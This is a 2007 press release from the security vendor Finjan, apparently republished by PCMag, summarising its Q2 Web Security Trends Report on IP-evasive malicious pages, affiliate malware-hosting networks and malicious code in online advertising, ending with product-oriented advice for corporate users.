San Jose, CA /Finjan, a leader in web security products, today released its Web Security Trends Report (Q2 2007) which focuses on a new genre of highly sophisticated and evasive attacks designed to potentially bypass signature-based and database-reliant security technology. The report also describes the proliferation of affiliation networks based on a “hosted model” for malicious code, which utilize off-the-shelf malicious code packages to compromise highly popular websites and even government domains. Also following on from the trend revealed in Finjan’s Q1 report, new examples show the growing presence of malicious code in online advertising on legitimate websites.

Evasive Attacks Cover Their Tracks to Avoid Detection

Recent findings by Finjan reveal that hackers have created a new class of highly evasive attacks. These attacks represent a quantum leap in terms of their technological sophistication, going far beyond drive-by downloads and code obfuscation. In order to minimize the malicious code’s window of exposure, evasive attacks keep track of the actual IP addresses of visitors to a particular website or web page. Using this information, the attackers restrict exposure to the malicious code to a single view from each unique IP address. This means that the second time a given IP address tries to access the malicious page, a benign page will be automatically displayed in its place. All traces of the initial malicious page completely disappear. The report provides examples of evasive attacks, along with the actual code used by the hacker to run them.

“Evasive attack techniques where malicious code is controlled per IP address, country of origin or number of visits provide hackers with the ability to minimize the malicious code’s exposure, thereby reducing the likelihood of detection. Moreover, evasive attacks can identify the IP addresses of crawlers used by URL filtering, reputation services and search engines, replying to these engines with legitimate content and increasing the chances of mistakenly being classified by them as a legitimate category,” said Yuval Ben-Itzhak, CTO, Finjan. “The combination of these evasive attacks with code obfuscation techniques significantly enhances the capability of sophisticated hackers to go undetected.”

Driven by strong financial incentives and using widely available malicious code software packages, “affiliations” are being created that promote infections using a “hosted” model for the malicious code. In this scheme, the malicious code is usually located on a dedicated malicious code server (or a site that has been hacked to host the malicious code), while the participants in the affiliation insert a reference to the malicious code in various websites. The website owners are paid according to the number of infected visitors to the site. Finjan’s findings attest to the growing magnitude of these affiliation networks, which have been used to compromise highly popular websites and even government domains. Trojan keylogger log files show that the malicious code is being used to steal sensitive financial and personal information, such as bank account details, credit card numbers and social security IDs, for which e-criminals are willing to pay top dollar. The report includes statistics and maps showing how a single malicious code server operated by just one hacker has infected thousands of legitimate websites worldwide. As hundreds of hackers are already using this technique, this implies that the magnitude of this problem is already having a global impact.

“Many sites are getting hit by stealthy attacks that leave no visible damage and simply insert a line of HTML code that points to malicious code on an external server,” stated Ben-Itzhak. “The upshot is that any visitor to such a website may be jeopardizing his/her personal identity, bank account details and credit card numbers to the e-criminals behind these operations. Business users that rely solely on signature-based anti-virus or URL filtering solutions might be left vulnerable to these types of attacks.”

Malicious Code in Online Advertising

A follow-up study conducted by Finjan’s MCRC has shed additional light on the growing presence of malicious code in online advertising. As websites depend more on advertising revenues, they often display ads from third party advertising networks, over which they may have little or no control. While legitimate website owners trust advertisers to display non-malicious content, advertisers sometimes “sublet” their space to others. This hierarchy can often comprise several layers, seriously compromising the level of control the website owner has over advertising content. The report includes a detailed analysis of an innocent blog site that deploys keyword-based advertisements that are placed automatically from an ad server. However, Finjan found that the ad content also included obfuscated references to malicious code on a third site that uses multiple infection techniques to download a Trojan keylogger to the user’s machine. Another recent example of this trend was a banner ad hiding code with the ANI exploit that was unknowingly being hosted on one of the most popular techie websites.

“As commercially-motivated hackers look for ways to reach the widest possible audience in the shortest possible time, advertising has become a prime target for malicious code,” stated Ben-Itzhak. “By targeting high-volume websites which are generally considered “trusted” by most URL filtering products, hackers can achieve higher infection rates and earn more money.”

Parting Advice

Finjan’s research confirms that attempts to pattern malicious code and create signatures, or to categorize known malicious sites, are clearly “too little, too late” when it comes to providing adequate protection to today’s dynamic and evasive web threats. “There are no second chances when it comes to safeguarding users’ personal details and securing confidential corporate information. The way to detect modern malicious code is to be able to understand in real-time what the code intends to do, before it does it,” concludes Ben-Itzhak.

Finjan offers the following advice for corporate users:

Make sure that real-time inspection and protection is added to your web security solution. Chasing the attack vectors after the event is always “too little, too late”, particularly if you get hit by a zero day attack that your security solution does not recognize.

Make sure that your security solution is updated to handle new technologies and trends. Security products should protect you from the vulnerabilities rather than just attacks and exploits.

Check your vendor’s research capabilities and their ability to provide up-to-date information which is immediately translated into actionable security measures.

Examine your egress data policy to make sure that you cover all known and suspicious sites.

Use of this site is governed by our Terms of Use and Privacy Policy.
Copyright 1996- Ziff Davis, LLC. All Rights Reserved.
Reproduction in whole or in part in any form or medium without express written permission
of Ziff Davis, LLC. is prohibited.PCMag Digital GroupAdChoice